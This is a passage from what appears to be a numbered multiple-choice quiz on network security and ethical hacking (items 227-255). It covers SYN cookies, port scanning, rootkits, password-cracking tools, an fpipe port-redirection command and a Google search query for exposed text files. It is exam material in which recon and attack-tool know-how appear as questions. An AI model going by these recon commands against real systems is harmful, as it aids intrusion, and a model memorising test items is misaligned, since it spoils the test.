d) A site where users can upload but not download

227. What is the name given to the activity that involves collecting information that will later be used for monitoring and review purposes?
a) Logging
b) Auditing
c) Inspecting
d) Vetting

228. Which of the following sentences best describes SYN cookies?
a) It is a SYN packet that consists of SYN-ACK and RESET signals.
b) It is a SYN grabber that grabs a session sequence number.
c) It is a single value created by applying a cryptographic one-way hash function to the source and destination IP addresses, port numbers and a secret number.
d) It is a special number that provides the source and destination IP addresses and session sequence number.

229. The objectives of port scanning are to identify the following except ______.
a) Hardware model number
b) Open ports
c) Host operating system
d) Software or service versions

230. Each of the following can be identified as physical security except __________.
a) door locks
b) alarm systems
c) antivirus software
d) lighting

231. A host has a Class B IP address of 128.78.0.2. Which network address does this host belong to if there is no subnetting?
a) 128.78.0.0
b) 128.78.1.0
c) 128.78.2.0
d) 128.78.3.0

232. When an attacker interacts with a Web application, it starts to guess the IDs and passwords of that session. This form of Web attack is known as ______.
a) Session Hijacking
b) URL Session Tracking
c) Account Harvesting
d) Web Harvesting

233. A rootkit has been discovered on your mission-critical database server. What is the best step to take to return this system to production?
a) Download history
b) Run an antivirus tool
c) Install an HIDS
d) Apply vendor patches

234. If the attack is process killing, which of the following categories of Denial-of-Service attack does it belong to?
a) Locally stopping services
b) Remotely stopping services
c) Locally exhausting resources
d) Remotely exhausting resources

235. Services using an interprocess communication share such as network file and print sharing services leave the network susceptible to which of the following attacks?
a) Spoofing
b) Null sessions
c) DNS kiting
d) ARP poisoning

236. Which of the following components of an IP address is used to distinguish the network address from a host address?
a) Default gateway
b) Subnet mask
c) DNS server
d) WINS server

237. The purpose of Ethereal's Filter option is to view the desired _________.
a) Source
b) Destination
c) Info
d) Protocol

238. Explain the command execution statement as shown: >fpipe -l 8081 -r 8080 192.168.1.5
a) redirect traffic from local machine at port 8081 to 192.168.1.5 port 8080.
b) redirect traffic from port 8081 to port 8080 on the same machine with IP address 192.168.1.5.
c) redirect traffic from local machine at port 8080 to 192.168.1.5 port 8081.
d) redirect traffic from port 8080 of 192.168.1.5 to port 8081 of the attacker's system.

239. Which layer of the OSI model is responsible for converting data into signals appropriate for the transmission medium?
a) Application
b) Network
c) Data Link
d) Physical

240. The following are the most notable password cracking tools except ______.
a) SuperCracker
b) Cain
c) John the Ripper
d) Pandora

241. Password guessing tools are useful in finding passwords on a target machine except that ______.
a) they are difficult to use
b) they might take too long
c) they do not offer a brute-force selection feature
d) their word library is too small

242. A port scan has been performed on your e-mail server. Which of the following services and ports should be disabled?
a) TCP port 21.
b) TCP port 25.
c) TCP port 110.
d) TCP port 143.

243. Which of the following devices connects different network segments and uses tables to create a map of the network topology?
a) Switch
b) Router
c) Bridge
d) Hub

244. What port is used for a DNS zone transfer?
a) 53
b) 80
c) 135
d) 137

245. What is the best countermeasure against malicious code?
a) Manage user behavior
b) Prevent reuse of external removable media
c) Use antivirus software
d) Disable mobile code on web browsers

246. Which utility can you use to find the MAC and TCP/IP addresses of your Windows workstation?
a) ping
b) ipconfig
c) ipconfig /all
d) tracert

247. The following are defences against password cracking attacks except _______.
a) anti-password cracking software
b) strong password policy
c) password filtering software
d) use other authentication tools

248. Which of the following web server characteristics would be flagged as a risk by a vulnerability scanner?
a) Operating system not updated to latest patch level.
b) HTTPS server listening on port 443.
c) Network packets being sent in clear text.
d) HTTP server listening on port 80.

249. Which of the following is a valid Google search command to look for all text files containing "secret"?
a) site:all filetype:txt secret
b) site:com filetype:txt secret
c) site:org filetype:txt secret
d) site:net filetype:txt secret

250. Firewalls provide security through what mechanism?
a) Watching for intrusions
b) Controlling traffic entering and leaving a network
c) Requiring strong passwords
d) Preventing misuse of company resources

251. When the telnet service is activated, it is accessed through ______.
a) TCP port 21
b) TCP port 80
c) TCP port 23
d) TCP port 25

252. The Ethereal packet capturing process would display the following except ______.
a) User id and password
b) Source
c) Destination
d) Protocol

253. You want to use NAT on your network, and you have received a Class C address from your ISP. What range of addresses should you use on the internal network?
a) 10.x.x.x
b) 172.16.x.x
c) 172.31.x.x
d) 192.168.x.x

254. Which of the following files is most likely to contain a virus?
a) database.dat.
b) bigpic.jpeg.
c) note.txt.
d) picture.gif.exe.

255. An attacker trying to exploit a web server will likely want to scan systems running web services. What port will the attacker scan for?
a) 21
b) 25
c) 80
d) 110

Download link for 255 quiz with all answers for Final Exam Topic 1 to Topic 11
